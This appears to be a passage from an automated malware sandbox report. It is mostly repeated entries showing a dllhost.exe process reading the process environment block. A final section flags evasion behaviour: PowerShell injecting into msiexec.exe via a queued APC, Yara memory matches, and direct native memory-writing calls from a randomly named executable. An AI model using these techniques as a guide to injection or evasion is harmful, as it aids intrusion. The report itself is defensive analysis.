              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov ecx, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov ecx, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov ecx, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov ecx, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h]11_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387D0C0 mov eax, dword ptr fs:[00000030h]11_2_0387D0C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387D0C0 mov eax, dword ptr fs:[00000030h]11_2_0387D0C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D50D9 mov eax, dword ptr fs:[00000030h]11_2_038D50D9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038820DE mov eax, dword ptr fs:[00000030h]11_2_038820DE
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038290DB mov eax, dword ptr fs:[00000030h]11_2_038290DB
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FA020 mov eax, dword ptr fs:[00000030h]11_2_037FA020
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FC020 mov eax, dword ptr fs:[00000030h]11_2_037FC020
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038250E4 mov eax, dword ptr fs:[00000030h]11_2_038250E4
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038250E4 mov ecx, dword ptr fs:[00000030h]11_2_038250E4
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038860E0 mov eax, dword ptr fs:[00000030h]11_2_038860E0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038080E9 mov eax, dword ptr fs:[00000030h]11_2_038080E9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038420F0 mov ecx, dword ptr fs:[00000030h]11_2_038420F0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03884000 mov ecx, dword ptr fs:[00000030h]11_2_03884000
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FC0F0 mov eax, dword ptr fs:[00000030h]11_2_037FC0F0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381E016 mov eax, dword ptr fs:[00000030h]11_2_0381E016
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381E016 mov eax, dword ptr fs:[00000030h]11_2_0381E016
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381E016 mov eax, dword ptr fs:[00000030h]11_2_0381E016
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381E016 mov eax, dword ptr fs:[00000030h]11_2_0381E016
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FA0E3 mov ecx, dword ptr fs:[00000030h]11_2_037FA0E3
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C903E mov eax, dword ptr fs:[00000030h]11_2_038C903E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C903E mov eax, dword ptr fs:[00000030h]11_2_038C903E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C903E mov eax, dword ptr fs:[00000030h]11_2_038C903E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C903E mov eax, dword ptr fs:[00000030h]11_2_038C903E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03896030 mov eax, dword ptr fs:[00000030h]11_2_03896030
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03802050 mov eax, dword ptr fs:[00000030h]11_2_03802050
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382B052 mov eax, dword ptr fs:[00000030h]11_2_0382B052
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038A705E mov ebx, dword ptr fs:[00000030h]11_2_038A705E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038A705E mov eax, dword ptr fs:[00000030h]11_2_038A705E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03886050 mov eax, dword ptr fs:[00000030h]11_2_03886050
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388106E mov eax, dword ptr fs:[00000030h]11_2_0388106E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D5060 mov eax, dword ptr fs:[00000030h]11_2_038D5060
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03811070 mov eax, dword ptr fs:[00000030h]11_2_03811070
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03811070 mov ecx, dword ptr fs:[00000030h]11_2_03811070
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03811070 mov eax, dword ptr fs:[00000030h]11_2_03811070
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03811070 mov eax, dword ptr fs:[00000030h]11_2_03811070
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03811070 mov eax, dword ptr fs:[00000030h]11_2_03811070
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03811070 mov eax, dword ptr fs:[00000030h]11_2_03811070
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03811070 mov eax, dword ptr fs:[00000030h]11_2_03811070
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03811070 mov eax, dword ptr fs:[00000030h]11_2_03811070
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03811070 mov eax, dword ptr fs:[00000030h]11_2_03811070
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03811070 mov eax, dword ptr fs:[00000030h]11_2_03811070
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03811070 mov eax, dword ptr fs:[00000030h]11_2_03811070
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03811070 mov eax, dword ptr fs:[00000030h]11_2_03811070
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03811070 mov eax, dword ptr fs:[00000030h]11_2_03811070
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382C073 mov eax, dword ptr fs:[00000030h]11_2_0382C073
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FD08D mov eax, dword ptr fs:[00000030h]11_2_037FD08D
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387D070 mov ecx, dword ptr fs:[00000030h]11_2_0387D070
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BF78A mov eax, dword ptr fs:[00000030h]11_2_038BF78A
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FB765 mov eax, dword ptr fs:[00000030h]11_2_037FB765
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FB765 mov eax, dword ptr fs:[00000030h]11_2_037FB765
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FB765 mov eax, dword ptr fs:[00000030h]11_2_037FB765
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FB765 mov eax, dword ptr fs:[00000030h]11_2_037FB765
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038897A9 mov eax, dword ptr fs:[00000030h]11_2_038897A9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388F7AF mov eax, dword ptr fs:[00000030h]11_2_0388F7AF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388F7AF mov eax, dword ptr fs:[00000030h]11_2_0388F7AF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388F7AF mov eax, dword ptr fs:[00000030h]11_2_0388F7AF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388F7AF mov eax, dword ptr fs:[00000030h]11_2_0388F7AF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388F7AF mov eax, dword ptr fs:[00000030h]11_2_0388F7AF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038007AF mov eax, dword ptr fs:[00000030h]11_2_038007AF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382D7B0 mov eax, dword ptr fs:[00000030h]11_2_0382D7B0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D37B6 mov eax, dword ptr fs:[00000030h]11_2_038D37B6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380C7C0 mov eax, dword ptr fs:[00000030h]11_2_0380C7C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038057C0 mov eax, dword ptr fs:[00000030h]11_2_038057C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038057C0 mov eax, dword ptr fs:[00000030h]11_2_038057C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038057C0 mov eax, dword ptr fs:[00000030h]11_2_038057C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038807C3 mov eax, dword ptr fs:[00000030h]11_2_038807C3
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F9730 mov eax, dword ptr fs:[00000030h]11_2_037F9730
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F9730 mov eax, dword ptr fs:[00000030h]11_2_037F9730
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380D7E0 mov ecx, dword ptr fs:[00000030h]11_2_0380D7E0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388E7E1 mov eax, dword ptr fs:[00000030h]11_2_0388E7E1
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038227ED mov eax, dword ptr fs:[00000030h]11_2_038227ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038227ED mov eax, dword ptr fs:[00000030h]11_2_038227ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038227ED mov eax, dword ptr fs:[00000030h]11_2_038227ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038047FB mov eax, dword ptr fs:[00000030h]11_2_038047FB
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038047FB mov eax, dword ptr fs:[00000030h]11_2_038047FB
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03805702 mov eax, dword ptr fs:[00000030h]11_2_03805702
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03805702 mov eax, dword ptr fs:[00000030h]11_2_03805702
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03807703 mov eax, dword ptr fs:[00000030h]11_2_03807703
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383C700 mov eax, dword ptr fs:[00000030h]11_2_0383C700
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03800710 mov eax, dword ptr fs:[00000030h]11_2_03800710
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03830710 mov eax, dword ptr fs:[00000030h]11_2_03830710
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383F71F mov eax, dword ptr fs:[00000030h]11_2_0383F71F
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383F71F mov eax, dword ptr fs:[00000030h]11_2_0383F71F
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03803720 mov eax, dword ptr fs:[00000030h]11_2_03803720
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381F720 mov eax, dword ptr fs:[00000030h]11_2_0381F720
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381F720 mov eax, dword ptr fs:[00000030h]11_2_0381F720
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381F720 mov eax, dword ptr fs:[00000030h]11_2_0381F720
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383C720 mov eax, dword ptr fs:[00000030h]11_2_0383C720
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383C720 mov eax, dword ptr fs:[00000030h]11_2_0383C720
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BF72E mov eax, dword ptr fs:[00000030h]11_2_038BF72E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C972B mov eax, dword ptr fs:[00000030h]11_2_038C972B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DB73C mov eax, dword ptr fs:[00000030h]11_2_038DB73C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DB73C mov eax, dword ptr fs:[00000030h]11_2_038DB73C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DB73C mov eax, dword ptr fs:[00000030h]11_2_038DB73C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DB73C mov eax, dword ptr fs:[00000030h]11_2_038DB73C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387C730 mov eax, dword ptr fs:[00000030h]11_2_0387C730
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03835734 mov eax, dword ptr fs:[00000030h]11_2_03835734
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380973A mov eax, dword ptr fs:[00000030h]11_2_0380973A
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380973A mov eax, dword ptr fs:[00000030h]11_2_0380973A
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383273C mov eax, dword ptr fs:[00000030h]11_2_0383273C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383273C mov ecx, dword ptr fs:[00000030h]11_2_0383273C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383273C mov eax, dword ptr fs:[00000030h]11_2_0383273C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03813740 mov eax, dword ptr fs:[00000030h]11_2_03813740
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03813740 mov eax, dword ptr fs:[00000030h]11_2_03813740
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03813740 mov eax, dword ptr fs:[00000030h]11_2_03813740
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D3749 mov eax, dword ptr fs:[00000030h]11_2_038D3749
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h]11_2_037FF7BA
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h]11_2_037FF7BA
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h]11_2_037FF7BA
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h]11_2_037FF7BA
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h]11_2_037FF7BA
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h]11_2_037FF7BA
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h]11_2_037FF7BA
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h]11_2_037FF7BA
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF7BA mov eax, dword ptr fs:[00000030h]11_2_037FF7BA
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383674D mov esi, dword ptr fs:[00000030h]11_2_0383674D
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383674D mov eax, dword ptr fs:[00000030h]11_2_0383674D
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383674D mov eax, dword ptr fs:[00000030h]11_2_0383674D
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03800750 mov eax, dword ptr fs:[00000030h]11_2_03800750
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842750 mov eax, dword ptr fs:[00000030h]11_2_03842750
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842750 mov eax, dword ptr fs:[00000030h]11_2_03842750
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388E75D mov eax, dword ptr fs:[00000030h]11_2_0388E75D
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03884755 mov eax, dword ptr fs:[00000030h]11_2_03884755
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03808770 mov eax, dword ptr fs:[00000030h]11_2_03808770
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03810770 mov eax, dword ptr fs:[00000030h]11_2_03810770
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03810770 mov eax, dword ptr fs:[00000030h]11_2_03810770
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03810770 mov eax, dword ptr fs:[00000030h]11_2_03810770
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03810770 mov eax, dword ptr fs:[00000030h]11_2_03810770
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03810770 mov eax, dword ptr fs:[00000030h]11_2_03810770
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03810770 mov eax, dword ptr fs:[00000030h]11_2_03810770
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03810770 mov eax, dword ptr fs:[00000030h]11_2_03810770
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03810770 mov eax, dword ptr fs:[00000030h]11_2_03810770
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03810770 mov eax, dword ptr fs:[00000030h]11_2_03810770
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03810770 mov eax, dword ptr fs:[00000030h]11_2_03810770
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03810770 mov eax, dword ptr fs:[00000030h]11_2_03810770
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03810770 mov eax, dword ptr fs:[00000030h]11_2_03810770
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388368C mov eax, dword ptr fs:[00000030h]11_2_0388368C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388368C mov eax, dword ptr fs:[00000030h]11_2_0388368C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388368C mov eax, dword ptr fs:[00000030h]11_2_0388368C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388368C mov eax, dword ptr fs:[00000030h]11_2_0388368C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03804690 mov eax, dword ptr fs:[00000030h]11_2_03804690
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03804690 mov eax, dword ptr fs:[00000030h]11_2_03804690
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383C6A6 mov eax, dword ptr fs:[00000030h]11_2_0383C6A6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038366B0 mov eax, dword ptr fs:[00000030h]11_2_038366B0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380B6C0 mov eax, dword ptr fs:[00000030h]11_2_0380B6C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380B6C0 mov eax, dword ptr fs:[00000030h]11_2_0380B6C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380B6C0 mov eax, dword ptr fs:[00000030h]11_2_0380B6C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380B6C0 mov eax, dword ptr fs:[00000030h]11_2_0380B6C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380B6C0 mov eax, dword ptr fs:[00000030h]11_2_0380B6C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380B6C0 mov eax, dword ptr fs:[00000030h]11_2_0380B6C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C16CC mov eax, dword ptr fs:[00000030h]11_2_038C16CC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C16CC mov eax, dword ptr fs:[00000030h]11_2_038C16CC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C16CC mov eax, dword ptr fs:[00000030h]11_2_038C16CC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C16CC mov eax, dword ptr fs:[00000030h]11_2_038C16CC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383A6C7 mov ebx, dword ptr fs:[00000030h]11_2_0383A6C7
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383A6C7 mov eax, dword ptr fs:[00000030h]11_2_0383A6C7
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BF6C7 mov eax, dword ptr fs:[00000030h]11_2_038BF6C7
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038316CF mov eax, dword ptr fs:[00000030h]11_2_038316CF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h]11_2_037FF626
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h]11_2_037FF626
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h]11_2_037FF626
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h]11_2_037FF626
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h]11_2_037FF626
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h]11_2_037FF626
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h]11_2_037FF626
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h]11_2_037FF626
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF626 mov eax, dword ptr fs:[00000030h]11_2_037FF626
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382D6E0 mov eax, dword ptr fs:[00000030h]11_2_0382D6E0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382D6E0 mov eax, dword ptr fs:[00000030h]11_2_0382D6E0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038936EE mov eax, dword ptr fs:[00000030h]11_2_038936EE
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038936EE mov eax, dword ptr fs:[00000030h]11_2_038936EE
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038936EE mov eax, dword ptr fs:[00000030h]11_2_038936EE
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038936EE mov eax, dword ptr fs:[00000030h]11_2_038936EE
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038936EE mov eax, dword ptr fs:[00000030h]11_2_038936EE
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038936EE mov eax, dword ptr fs:[00000030h]11_2_038936EE
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387E6F2 mov eax, dword ptr fs:[00000030h]11_2_0387E6F2
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387E6F2 mov eax, dword ptr fs:[00000030h]11_2_0387E6F2
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387E6F2 mov eax, dword ptr fs:[00000030h]11_2_0387E6F2
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387E6F2 mov eax, dword ptr fs:[00000030h]11_2_0387E6F2
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038806F1 mov eax, dword ptr fs:[00000030h]11_2_038806F1
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038806F1 mov eax, dword ptr fs:[00000030h]11_2_038806F1
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BD6F0 mov eax, dword ptr fs:[00000030h]11_2_038BD6F0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383F603 mov eax, dword ptr fs:[00000030h]11_2_0383F603
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03831607 mov eax, dword ptr fs:[00000030h]11_2_03831607
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381260B mov eax, dword ptr fs:[00000030h]11_2_0381260B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381260B mov eax, dword ptr fs:[00000030h]11_2_0381260B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381260B mov eax, dword ptr fs:[00000030h]11_2_0381260B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381260B mov eax, dword ptr fs:[00000030h]11_2_0381260B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381260B mov eax, dword ptr fs:[00000030h]11_2_0381260B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381260B mov eax, dword ptr fs:[00000030h]11_2_0381260B

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_6044.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6044, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtClose: Direct from: 0x76F02B6C
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
